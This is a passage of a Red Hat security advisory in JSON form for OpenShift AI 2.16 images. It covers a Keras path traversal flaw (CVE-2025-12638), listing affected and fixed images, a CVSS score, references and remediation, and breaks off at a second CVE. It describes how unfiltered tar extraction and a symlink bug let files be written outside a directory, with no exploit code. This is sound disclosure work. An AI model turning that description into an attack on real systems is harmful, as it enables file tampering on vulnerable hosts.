"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2417711"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw has been discovered in Keras. The vulnerability arises because the function uses Python\u0027s tarfile.extractall() method without the security-critical filter=\u0027data\u0027 parameter. Although Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering occurs before extraction, and a PATH_MAX symlink resolution bug triggers during extraction. This bug causes symlink resolution to fail due to path length limits, resulting in a security bypass that allows files to be written outside the intended extraction directory.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Path Traversal Vulnerability in keras",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12638"
},
{
"category": "external",
"summary": "RHBZ#2417711",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2417711"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12638",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12638"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12638",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12638"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951",
"url": "https://github.com/keras-team/keras/commit/47fcb397ee4caffd5a75efd1fa3067559594e951"
},
{
"category": "external",
"summary": "https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4",
"url": "https://huntr.com/bounties/f94f5beb-54d8-4e6a-8bac-86d9aee103f4"
}
],
"release_date": "2025-11-28T14:06:02.069000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L",
"version": "3.0"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Path Traversal Vulnerability in keras"
},
{
"cve": "CVE-2025-12816",
"cwe": {
"id": "CWE-179",
"name": "Incorrect Behavior Order: Early Validation"
},
"discovery_date": "2025-11-25T20:01:05.875196+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2417097"
}
],
"notes": [
{
"category": "description",
